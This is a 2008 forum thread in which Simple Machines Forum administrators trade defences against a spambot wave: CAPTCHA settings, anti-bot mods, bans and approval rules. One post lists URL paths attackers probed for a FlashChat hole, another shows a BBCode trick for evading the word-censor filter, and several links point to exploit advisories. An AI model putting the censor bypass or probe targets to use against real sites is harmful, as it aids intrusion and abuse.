1.1.7 addressed the cross-scripting and related vulnerabilities in this advisory (http://secunia.com/advisories/32516/).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 14, 2008, 08:01:06 PM
I have three SMF 1.1.7 sites and one SMF 2.x beta test site.
They are all on the same host, within the same main account.
One of the  SMF 1.1.7 sites was being spammed. (none of the others yet)
I found it strange because they were not spamming something simple to spam, such as the Plug Boards. (integrated via Site Integration Mod)
I have turned the registration off, after getting sick and tired of banning IPs.
It is not my main site, I don't promote it, and there are other integrated scripts which people can register for, so losing members for the main site is not important.
After reading a few pages here, I have learned quite a bit.

I also did a quick Google search: (Keep in mind, some are old posts and are for earlier versions of SMF)
I found nothing for SMF 1.1.7 or 2.x, probably due to their new release.
The search I made was "simple machine forums security"

http://www.juniper.net/security/auto/vulnerabilities/vuln28866.html

http://xforce.iss.net/xforce/xfdb/34907

http://securityvulns.com/Odocument766.html

http://packetstormsecurity.org/0811-exploits/smf-exec.txt

http://www.juniper.net/security/auto/vulnerabilities/vuln31053.html

http://www.securityfocus.com/bid/31053

http://www.net-security.org/vuln.php?id=6049

https://www.securinfos.info/english/security-advisories-alerts/20081105-Simple-Machines-Forum-Cross-Site-Request-Forgery-Vulnerability-Anonymoused--3.php

http://www.governmentsecurity.org/archive/t15171.html

http://www.frsirt.com/english/advisories/2007/3568/products

http://secunia.com/advisories/31750/

http://heapoverflow.com/f0rums/public/10090-simple-machines-forum-1-1-6-lfi-code-execution-exploit.html

http://www.juniper.net/security/auto/vulnerabilities/vuln31594.html

http://www.hackerscenter.com/index.php?/HSC-Research-Group/Advisories/HSC-Simple-Machines-Forum-XSS-Vulnerabilities.html

http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2008-04/msg00234.html

EDIT:
Just installed "Are You Human" on two of the three sites. (one is not using default theme and needs a manual edit)
I left the banned IPS in place and enabled registrations again. I also set the Registration Setting to "Member Approval" I logged out then tried to register without changing the "Are You Human" question. NICE.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 08:21:34 PM
I believe all those SMF vulnerabilities have been addressed in various upgrades/patches.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 14, 2008, 08:24:17 PM
Quote from: dwd2000 on November 14, 2008, 08:01:06 PM
I also did a quick Google search: (Keep in mind, some are old posts and are for earlier versions of SMF)
I found nothing for SMF 1.1.7 or 2.x, probably due to their new release.
The search I made was "simple machine forums security"

All taken care of with the latest releases. Anyway, what does all that have to do with the spamming?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 08:33:06 PM
Quote from: Motoko-chan...what does all that have to do with the spamming?

This one (http://www.juniper.net/security/auto/vulnerabilities/vuln31594.html), related to 1.1.6, says:

QuoteAttackers can exploit this issue to bypass filter restrictions and display spam content on the affected site.

Just reading what it says. In any event, as you say, it's been addressed (by 1.1.7).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 14, 2008, 08:44:14 PM
Quote from: rvforumite on November 14, 2008, 08:21:34 PM
I believe all those SMF vulnerabilities have been addressed in various upgrades/patches.

Yes, I realize that, but it wouldn't hurt to do the same search again periodically, to see if someone reveals something else. Some idiot spammer might like to brag.

I also read that SMF 1.1.7 didn't address any security issues and some of the links were for SMF 1.1.6.

Quote from: Deprecated on November 14, 2008, 07:02:21 PM
The data indicates that the spam attacks are not related to the 1.1.7 upgrade, and that makes sense because the 1.1.7 upgrade has nothing to do with keeping spammers out. (Or at least I'm told that. I haven't personally verified it by a code inspection.)

EDIT:
Different subject.
I also read somewhere else in this topic about something else that might work. (sorry if I didn't read every post)
My main site has "Custom Profile Field Mod" installed and some of the questions are "Required" I have no attacks on this site.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 14, 2008, 09:07:18 PM
Quote from: rvforumite on November 14, 2008, 08:33:06 PM
QuoteAttackers can exploit this issue to bypass filter restrictions and display spam content on the affected site.

Just reading what it says. In any event, as you say, it's been addressed (by 1.1.7).

It hasn't been addressed, it's not a security issue. It's not even a bug.

The core issue is that if someone wants to bypass the censored words list, they can by splitting it by bbc.

For example, say the word "extravagant" is censored. You can get it to display by doing something like: [i]extrav[/i][/i]gant[/i]

That's all that issue is about.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 14, 2008, 09:20:32 PM
Quote from: Motoko-chan on November 14, 2008, 09:07:18 PM
Quote from: rvforumite on November 14, 2008, 08:33:06 PM
QuoteAttackers can exploit this issue to bypass filter restrictions and display spam content on the affected site.

Just reading what it says. In any event, as you say, it's been addressed (by 1.1.7).

It hasn't been addressed, it's not a security issue. It's not even a bug.

The core issue is that if someone wants to bypass the censored words list, they can by splitting it by bbc.

For example, say the word "extravagant" is censored. You can get it to display by doing something like: [i]extrav[/i][/i]gant[/i]

That's all that issue is about.

I am guilty of not reading everything. :-[
At the same time, someone might learn something. O:)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 10:05:19 PM
Quote from: dwd2000 on November 14, 2008, 08:44:14 PMYes, I realize that, but it wouldn't hurt to do the same search again periodically...

We do.

Quote from: dwd2000 on November 14, 2008, 09:20:32 PM
I am guilty of not reading everything. :-[
At the same time, someone might learn something. O:)

I started this topic. I have read every post. If there were any significant changes or new ideas or cancellations of any suggestions in the OP I would have edited it.

Trust me man, I spent 3-4 hours that day researching and writing the OP. I consulted with my colleagues. I took over two fatherless mods because of it. We will update the OP if anything significant occurs.

So far all we've done in this topic is refine a few things. Nothing in the OP has changed.

Oh and y'all that's thanked me, y'all's very welcome! :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 14, 2008, 10:09:14 PM
Quote from: Deprecated on November 14, 2008, 10:05:19 PM
Quote from: dwd2000 on November 14, 2008, 08:44:14 PMYes, I realize that, but it wouldn't hurt to do the same search again periodically...

We do.

;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: metallica48423 on November 14, 2008, 10:49:14 PM
QuoteI also read that SMF 1.1.7 didn't address any security issues

Not sure of your source, but there were two important security issues patched in the 1.1.7 release.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 14, 2008, 10:52:22 PM
Deprecated,

Just to let you know...

1. Thanks for the long effort at researching.
2. Thanks for the long effort at posting, and keeping people up to date.
3. Thanks for getting to work on those 2 mods. Can't wait to see which one you get working first.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 10:58:17 PM
QuoteIt hasn't been addressed, it's not a security issue. It's not even a bug.

I'll admit to being confused and, as a result, maybe adding more confusion into the mix.

In this message (http://www.simplemachines.org/community/index.php?topic=273946.msg1795065#msg1795065) Metallica confirmed that 1.1.7 addressed this issue (http://secunia.com/advisories/32516/) reported by Secunia. The Secunia report looked very similar to the one reported by Juniper (http://www.juniper.net/security/auto/vulnerabilities/vuln31594.html). Both referred to SMF 1.1.6, but now I see that they read somewhat differently.

Apologies if I misunderstood what I read in any of the above. I bow to the superior knowledge and experience of others here. All I'm trying to do is learn and keep my forum healthy. SMF has been rock solid for me from day 1, and I appreciate all the support I've had from the SMF team.

Maybe someone knowledgeable should correct Juniper &/or Secunia so that folks like me don't get confused/misled.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 11:07:27 PM
rvvorumite, you already posted the link yourself:

Solution:
Update to version 1.0.15 or 1.1.7. (http://secunia.com/advisories/32516/)

Pretty much exactly what I said in the OP although I have been ignoring 1.0.15 (not my bag).

That's Secunia. I presume the other site has been updated or will be updated.

The best things you can do are (1) keep reading SMF forums, and (2) come here if you have any problems.

All those hacked forums out there, all the spammed sites, all the ones that got compromised or flooded with spam? Most of them across the Internet are probably not reading this. Most of them are probably still broken.

Just keep reading SMF's site. We don't get paid either way (we're all volunteers here) but your site works better if you keep in touch.

Keep in touch, y'all hear? :D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 11:10:30 PM
After beating my head against the wall trying to install the reCAPTCHA mod, this evening I read here (http://www.simplemachines.org/community/index.php?topic=274420.msg1799050#msg1799050) (in the CM area) that there's a bug report on the failure to install. I can't figure out how others say they installed it with no problem.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 11:14:21 PM
rvforumite, please post a support request in the modification's support topic. I'm sure MC will fix you up!

here: http://www.simplemachines.org/community/index.php?topic=213535.0
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 14, 2008, 11:15:28 PM
Quote from: Deprecated on November 14, 2008, 11:07:27 PMJust keep reading SMF's site. We don't get paid either way ... but your site works better if you keep in touch.

err... that's what I've ben doing. I've even referred admins/mods on other (spammed) non-SMF forums to this discussion. But, you can only lead a horse to water ...

Quotewe're all volunteers here

Understood, and it's very much appreciated. FWIW I and the staff on my forum are also volunteers, and most of us have been doing it for over 15 years. So we do understand what it takes to support forum members  ;)

Y'all keep up the good work. SMF has a well-earned good following.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 14, 2008, 11:21:49 PM
Quote from: metallica48423 on November 14, 2008, 10:49:14 PM
QuoteI also read that SMF 1.1.7 didn't address any security issues

Not sure of your source, but there were two important security issues patched in the 1.1.7 release.

http://www.simplemachines.org/community/index.php?topic=273816.msg1798854#msg1798854

NOTE:
My intention with my previous posts here was not intended to put down or degrade SMF in any way.
I know, understand, as well as appreciate all the work done here. My sole intention was to help.
If anyone misunderstands that, I am sorry.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mashby on November 14, 2008, 11:24:53 PM
I have played Whack-A-Mole (banning IPs, usernames, drinking beer). None of that made a difference. I am running 1.1.7 (and won't upgrade to 2.0 for a lot of reasons). Changing the "Complexity of visual verification image" to High stopped everything. I released all bans and continue to drink beer and am very satisfied with SMF. Rock on.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 14, 2008, 11:35:12 PM
dwd2000, don't sweat it. I answer a lot of support topics where people are upset. You probably never saw me put my fist through a CRT monitor. LCD monitors are so much more fist friendly! No glass! :P

Hey mashby, nothin' better than getting drunk and getting out the ban hammer! ;) :P

We all rock on. And the best part of it is watching the spammers trying to get in, kind of like watching bugs hit your windshield as you travel down the Interstate! :D Or maybe like watching flies hit your electric zapper! :D


Zzzzzzzzzzzztttttttttttttttt!!!! :P :P :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 14, 2008, 11:53:23 PM
Quote from: Deprecated on November 14, 2008, 11:35:12 PM
dwd2000, don't sweat it. I answer a lot of support topics where people are upset. You probably never saw me put my fist through a CRT monitor. LCD monitors are so much more fist friendly! No glass! :P

Hey mashby, nothin' better than getting drunk and getting out the ban hammer! ;) :P

We all rock on. And the best part of it is watching the spammers trying to get in, kind of like watching bugs hit your windshield as you travel down the Interstate! :D Or maybe like watching flies hit your electric zapper! :D


Zzzzzzzzzzzztttttttttttttttt!!!! :P :P :P

Thanks. I needed that, but I don't drink.  :D

I was originally on the forums to find an answer to another problem, when I stumbled on to this. My mind was in several places at once.
I'm also in the middle of writing a support note to my host. Yes, I'm explaining that it seems to be directed at sites that don't have a human interaction type registration. (drop down menu or similar) ...and not just SMF sites.
I have one site that has "Custom Profile Field Mod" installed, with some fields being required. That site has not been infected, although I am getting visitors trying to register. I have checked the IPs of those guests against the banned IPs on the infected site and some match.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: metallica48423 on November 15, 2008, 12:35:01 AM
Quote from: dwd2000 on November 14, 2008, 11:21:49 PM
Quote from: metallica48423 on November 14, 2008, 10:49:14 PM
QuoteI also read that SMF 1.1.7 didn't address any security issues

Not sure of your source, but there were two important security issues patched in the 1.1.7 release.

http://www.simplemachines.org/community/index.php?topic=273816.msg1798854#msg1798854

NOTE:
My intention with my previous posts here was not intended to put down or degrade SMF in any way.
I know, understand, as well as appreciate all the work done here. My sole intention was to help.
If anyone misunderstands that, I am sorry.


I had never felt that was your intention.  I apoligize if i came across as such -- certainly was not my intention :P

Simply making sure misinformation doesn't creep around.  :) 
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: dwd2000 on November 15, 2008, 12:43:36 AM
Quote from: metallica48423 on November 15, 2008, 12:35:01 AM
Quote from: dwd2000 on November 14, 2008, 11:21:49 PM
Quote from: metallica48423 on November 14, 2008, 10:49:14 PM
QuoteI also read that SMF 1.1.7 didn't address any security issues

Not sure of your source, but there were two important security issues patched in the 1.1.7 release.

http://www.simplemachines.org/community/index.php?topic=273816.msg1798854#msg1798854

NOTE:
My intention with my previous posts here was not intended to put down or degrade SMF in any way.
I know, understand, as well as appreciate all the work done here. My sole intention was to help.
If anyone misunderstands that, I am sorry.


I had never felt that was your intention.  I apoligize if i came across as such -- certainly was not my intention :P

Simply making sure misinformation doesn't creep around.  :)

My note was not directed at anyone in particular.
It just happened to be on that reply.
No apologies needed, but thanks anyway.
I think it's a full moon tonight, or close to it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: junglecat on November 15, 2008, 12:56:11 AM
Well, now I know why we've been getting hit so hard by spam bots for the last several days.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on November 15, 2008, 05:03:10 AM
Quote from: akyhne on November 14, 2008, 06:46:12 PM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
In recent days there has been a huge surge in the numbers of spambots attacking SMF 1.1.x forums. Some have suggested that this is due to the recent SMF 1.1.7 security upgrade, but in fact the attacks are unrelated to the functional changes in SMF 1.1.7. This is supported by the fact that SMF 1.1.6 and earlier versions are also subject to the attacks. The attacks have nothing to do with the SMF 1.1.7 upgrade.


Hmm, I got 5 SMF 1.1.7 forums running. None of them were ever attacked. Now 3 are within the last few days. The forums are on very different servers. And another forum I visit a lot was attacked this morning... for the first time ever!

Maybe it's a coincidence.. I think not.
Fourth forum attacked this morning :(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Andreas4 on November 15, 2008, 06:28:02 AM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
2.) At least for now SMF 2.0 has not been affected. The new version has improved spam defenses including the ability to ask any number of verification questions (what year is it? are you a bot?). Since most forums will pick different questions, these questions are very difficult for spambots to answer. If you have been considering upgrading to 2.0, now might be a good time to do so.
+
Quote
Note: As this is in early beta we do not suggest running SMF 2.0 Beta 4 Public on a production site.
(from http://download.simplemachines.org)
=
???
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 15, 2008, 07:17:40 AM
Quote from: Andreas4 on November 15, 2008, 06:28:02 AM
Quote from: Deprecated on November 11, 2008, 06:26:59 PM
2.) At least for now SMF 2.0 has not been affected. The new version has improved spam defenses including the ability to ask any number of verification questions (what year is it? are you a bot?). Since most forums will pick different questions, these questions are very difficult for spambots to answer. If you have been considering upgrading to 2.0, now might be a good time to do so.
+
Quote
Note: As this is in early beta we do not suggest running SMF 2.0 Beta 4 Public on a production site.
(from http://download.simplemachines.org)
=
???

I do believe what Deprecated is meaning, is if you had been considering upgrading, even though the download site has that message, then now might be a good time.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on November 15, 2008, 12:18:52 PM
Quote from: mashby on November 14, 2008, 11:24:53 PM
I have played Whack-A-Mole (banning IPs, usernames, drinking beer). None of that made a difference. I am running 1.1.7 (and won't upgrade to 2.0 for a lot of reasons). Changing the "Complexity of visual verification image" to High stopped everything. I released all bans and continue to drink beer and am very satisfied with SMF. Rock on.

Yes 'HIGH' verification has worked for me too - no other mods either.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rsmini on November 15, 2008, 03:55:25 PM
High verification is working perfect for us as well as is member approval.....however ...

We have been subject to 3 hacker attacks this week. This time they have taken down our joomla website as well. In fact they have deleted the whole forum/smf website basically it has all gone for the second time this week.

And I am well cheesed off. and just off to contact the host.

We recently swapped the site from mmabo to joomla. We have never had a security problem with mambo. I wonder if could have anything to with the joomla/smf bridge we are using.

be carefull everyone if they can't get your smf site they may well get your joomla site
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: wagtail on November 15, 2008, 04:44:19 PM
They do seem to be attacking both joomla and smf.
I was getting about an equal number of spammers trying each.
Even though I don't use the bridge.

I used the are-you-human mod and put the age restriction on.
(Registering is now like filling a job application).  :D

Thanks for the mod advice in this thread btw Dep.

I also ban the miscreant's IP range from the server each time I spot one that checks out on stopforumspam.com
Error logs are showing 1-2 failed attempts/hour since I implemented the brute force and ignorance IP ban approach.

On the plus side, I am down to the usual 'once every now and again' bot managing to register a moniker on joomla and none on SMF.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rsmini on November 15, 2008, 04:47:34 PM
unfortunatly I can't do anything as both the  joomla / smf sites have gone. As soon as it is back I will try and add even more security

:( :( :(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Muldoon on November 15, 2008, 05:05:44 PM
Quote from: ModelBoatMayhem on November 15, 2008, 12:18:52 PM
Quote from: mashby on November 14, 2008, 11:24:53 PM
I have played Whack-A-Mole (banning IPs, usernames, drinking beer). None of that made a difference. I am running 1.1.7 (and won't upgrade to 2.0 for a lot of reasons). Changing the "Complexity of visual verification image" to High stopped everything. I released all bans and continue to drink beer and am very satisfied with SMF. Rock on.

Yes 'HIGH' verification has worked for me too - no other mods either.

Same here for me,...I believe it was on the 7th page of this thread that I mentioned this as well.  It's nice to see it working for others as well!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Storman™ on November 15, 2008, 05:39:43 PM
Came across this interesting thread in the forum on stopforumspam.com:

http://www.stopforumspam.com/forum/t142

Not sure if that mod is on the SMF site already but maybe helpful for some people ?

Also, one observation that I've made is that I have plenty of sites on version 1.1.5 and they are getting hammered at the moment. However I have one site on an old version 1.1.1 and I don't get any spam there whatsoever... bit strange really..  ???
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: jackregan on November 15, 2008, 05:44:59 PM
I am running a forum on 1.1.7 and over the last week or so I have noticed a massive massive increase in spambots.

My solution was to add a field to the registration form using the custom profile fields mod. The field requires input and simply asks 'what day of the week is it?'

The point being that I'll know straight away if the 'user' is human or not. (I have 'member approval' as the registration method.)

But, funnily enough, since I've made this change, I've had no spambots whatsoever. Maybe they can't handle fields that require forced input, other than username, E-mail, Password.

Hope that helps.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 15, 2008, 06:04:20 PM
Apologies if this is off-topic .....

Quote from: rsminiThis time they have taken down our joomla website as well. In fact they have deleted the whole forum/smf website basically it has all gone for the second time this week.

Do you by chance have FlashChat installed, either integrated with SMF or standalone? Reason I ask is that I had a hacker get in via a vulnerability in FC a year or so ago. Today I'm seeing lots of probes for the same vulnerability. I believe FC patched the problem but, in case you're running an old version, here's where they're probing:

/SMF_forum//inc/cmses/aedating4CMS.php
/cmses/aedating4CMS.php
/SMF_forum/chat//inc/cmses/aedating4CMS.php

That aedating4CMS.php script is used to integrate FlashChat with the aedating software package. If you're not running aedating (presumably not, since you're using SMF), remove that script. In fact, you can remove them all from the chat/inc/cmses/ folder except for the SMF ones and, if you're running FC standalone, you don't even need the SMF ones. If standalone, you need to keep the one that looks like statelessCMS.php.

One difference from prior attacks looking for this script is that some probes today show up in my logs as spiders, although the IP addresses don't resolve to any of the search engines.

Another previously reported vulnerability was in Coppermine Photo Gallery. These guys are also probing CPG today.

Apologies if this doesn't apply to you.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: andy_kim on November 15, 2008, 07:13:44 PM
Just to share the experiences of the last days ...

Also got some bots on our forum. Because I live in a timezone with 8 hours difference to the server the first day of the attacks had been unnoticed for some time and so some bots registered successfully and only two of them activated and made one post each. All others were waiting for activation.

Changed captcha from medium to high and activation to approval. I also banned this about a dozen IP addresses - even some say it is useless.

But since then there had been only a few attempts to register from banned IPs, and only a handful of other banned ones are revisiting 2-3 times a days now; sometimes with login, sometimes with activation and sometimes with post action. Creates about 20 entries in the error logs per day, so not a big deal.
Seems in my case that these guys are not so flexible with using different IP addresses.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Xarcell on November 15, 2008, 11:38:15 PM
I have a different problem, but I wonder if it's related.

All of my sites on on dreamhost. I have extra web secruity enabled there(don't know what it is).

However, every single site(5 of them) with SMF installed, has a parse error on the "Subs-Auth.php" file. For some reason, the bottom half of the file is missing.  because it's the Subs-Auth.php file, I wonder if it's related?

I've had this problem for a month now.

BTW, this has happened on SMF versions: 1.1 and 2.0 beta
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 15, 2008, 11:41:19 PM
Not related, and quite strange. Post a new topic and one of our support team members will help you.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: jackregan on November 16, 2008, 06:15:08 AM
I have now banned all E-mail addresses *@mail.ru

Okay, so I know it's a bit pointless banning individual addresses, but a whole domain might help, right?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 16, 2008, 06:19:59 AM
But they still join up and clutter up your user database.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: jackregan on November 16, 2008, 08:37:31 AM
I'm confused. How do they still join? I have set up a ban so that nobody with a *@mail.ru address can register
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on November 16, 2008, 08:45:01 AM
Banning allows them to register, but then be marked as banned.  Obviously that means they can't post, so from that point of view it works.

But I have found them using all sorts of email addresses and IPs, so I don't think it is the solution.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: jackregan on November 16, 2008, 09:09:39 AM
Is there no way to just stop anyone with a mail.ru address from registering in the first place??

Maybe I can just put a simple Javascript function in the registration form to immediately delete any mail.ru addresses from the address field when they blur (i.e. move away from) from that field.

But is there a way to do it with the forum software??
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 16, 2008, 09:19:27 AM
Quote from: jackregan on November 16, 2008, 09:09:39 AM
Is there no way to just stop anyone with a mail.ru address from registering in the first place??

Maybe I can just put a simple Javascript function in the registration form to immediately delete any mail.ru addresses from the address field when they blur (i.e. move away from) from that field.

But is there a way to do it with the forum software??

If you set a Full Ban for the domain, they should not be able to.

QuoteRestriction:
Full ban (All)
Partial ban (Select from below)
    Cannot post (?)
    Cannot register
    Cannot login
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrKim on November 16, 2008, 09:58:32 AM
In Admin/ Posts and Topics/ Time required between post from the same IP  will slow down a bot.  I have 60 secs. set. 

Kim
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Inuya5ha on November 16, 2008, 11:45:36 AM
Hi, I'd like to share a few ideas because this issue is driving me mad, I'm about to install the Puzzle and the new captcha things to try to avoid closing my forum permanently. I was using 1.1.5 and updated to 1.1.7, activated email registration with the harder captcha, and my disappointment after finding 30 new spambots accounts per day was larger than a server farm.

This is a large-scale, critial issue. A news item regarding this vulnerabilty MUST be added to the "Live from Simple Machines" section at the admin panel, linked to this topic or somewhere else. My forum is totally in SPANISH, but spambots ignore that and post bulls*** all around anyway.

Also, a warning MUST be shown on the download pages for versions 1.1.x, such as "These versions are vulnerable to SPAMBOT attacks. Please consider using version 2.0, or get outta here and go buy a paid forum." Seriously. Do you imagine how frustrated new admins would be, when they happily download and install SMF just to see spambots registering fake accounts and creating tons of BUY VIAGRA ONLINE topics on their brand new forum??

Now, fake accounts are being created in their majority from russian hosts with russian email accounts. This issue also affects Gmail and Hotmail, I'm sure they won't be quite happy to provide their services to spambot agents. ISPs should start considering creating a Great Firewall of China against Russia from accessing the Internet... after all, the only thing that comes from that country is spam, cracks-keygens-warez, and all forms of malicious software... therefore they sould use a parallel, isolated intranet acrosss Russia without access to the global Internet, to make it safer for all the connected human beings. But that's not SMF's responsability, so this last suggestion can be overlooked.

Getting serious again, all those sites linked by spambots should be detected abd banned from search engines permanently, that would be great. Instead of inreasing their rank, simply make them disappear from the surface of the net by removing them from search engines.

And one question.. if I install the reCAPTCHA and then update the forum, will it still work?
Regards
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Afro on November 16, 2008, 12:01:03 PM
I installed the mod ''Are You Human? Anti-Bot Registration Check'' and it stopped them ..i havent seen any of them bots since i did...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 16, 2008, 12:41:10 PM
Quote from: Inuya5ha on November 16, 2008, 11:45:36 AM
This is a large-scale, critical issue. A news item regarding this vulnerability MUST be added to the "Live from Simple Machines" section at the admin panel, linked to this topic or somewhere else.

I quite agree that SMF should add something about this to the SMF News section. It would help a lot of Admins that don't frequent the forum here, learn of what's actually going on here.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: babjusi on November 16, 2008, 12:44:11 PM
This topic should be stickied.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kat on November 16, 2008, 03:36:36 PM
I've asked the mods. ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rsmini on November 16, 2008, 05:07:03 PM
QuoteDo you by chance have FlashChat installed, either integrated with SMF or standalone? Reason I ask is that I had a hacker get in via a vulnerability in FC a year or so ago. Today I'm seeing lots of probes for the same vulnerability. I believe FC patched the problem

Good idea but no as far as I know I do not have flashchat installed.

Talking to a friend he said he heard a news item the other day that 3 ISP's in Russia had been closed down last week and this resulted in 70% of all the worlds spam had been stopped. But in response the hackers in Russia are tageting UK and Europe sites and forums in response.

Does this sound feasible?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: timmyrotter on November 16, 2008, 05:15:32 PM
thanks for the links!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 16, 2008, 05:59:54 PM
A hosting company was taken off the air last week, which is probably what your friend was referring to. Here's one of the many reports:  ChannelWeb (http://www.crn.com/security/212002220).

Google on the name in the article and you'll find lots more reports.

Consider it a temporary glitch for the spammers. They'll find another home and start back up.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kat on November 16, 2008, 06:04:22 PM
They'll bring the net to a standstill, eventually.

Daft buggers.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 16, 2008, 08:37:57 PM
Quote from: babjusi on November 16, 2008, 12:44:11 PMThis topic should be stickied.

Initially, as soon as I posted this topic I stickied it. I couldn't find the topic myself without looking carefully. I thought it over and un-stickied it. The simple fact is that when a board has three or more stickies nobody even bothers to read them. A more conservative read (my opinion) is that nobody reads stickies unless there's only one of them.

Babjusi, thank you for the implied compliment, and Kat for seconding. It was my personal decision upon posting this topic to elect to not make it sticky, because I believe that the topic has more chance of being stumbled upon if not sticky.

Please, just post a relevant comment to bump this topic if you think it is getting too low on the list. It will die a natural death when everybody has been satisfied with the advice in the OP.

Again, thank you for your implied compliment. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 16, 2008, 08:43:33 PM
Quote from: rsmini on November 16, 2008, 05:07:03 PM
Talking to a friend he said he heard a news item the other day that 3 ISP's in Russia had been closed down last week and this resulted in 70% of all the worlds spam had been stopped. But in response the hackers in Russia are tageting UK and Europe sites and forums in response.

Does this sound feasible?

Yes. That is why I've advised that banning email domains is playing the Whack-a-Mole game.

I've got dozens of email addresses and I'm not even a spammer. (Honest!) How hard could it be for spammerz to just use different email domains in their scripts?

One thing you have to understand: part of a spammer attack script is the part that registers large numbers of disposable email addresses. They just tweak the script slightly to use different domains if a lot of forum operators ban their email host.

You should also understand that the spammer scripts send the botmaster error logs telling why the scripts failed. It's not like you could just ban "mail.ru" and they wouldn't notice.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 16, 2008, 08:49:23 PM
Quote from: jackregan on November 15, 2008, 05:44:59 PM
I am running a forum on 1.1.7 and over the last week or so I have noticed a massive massive increase in spambots.

My solution was to add a field to the registration form using the custom profile fields mod. The field requires input and simply asks 'what day of the week is it?'

The point being that I'll know straight away if the 'user' is human or not. (I have 'member approval' as the registration method.)

But, funnily enough, since I've made this change, I've had no spambots whatsoever. Maybe they can't handle fields that require forced input, other than username, E-mail, Password.

Hope that helps.

Requesting other replies on this same suggestion. I haven't tried it but I believe it merits consideration.

Pending replies on if this works I'm giving consideration to adding this mod to the OP. None of my own forums are being spammed so I cannot tell for myself if this will work.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: eFishie on November 17, 2008, 01:19:28 AM
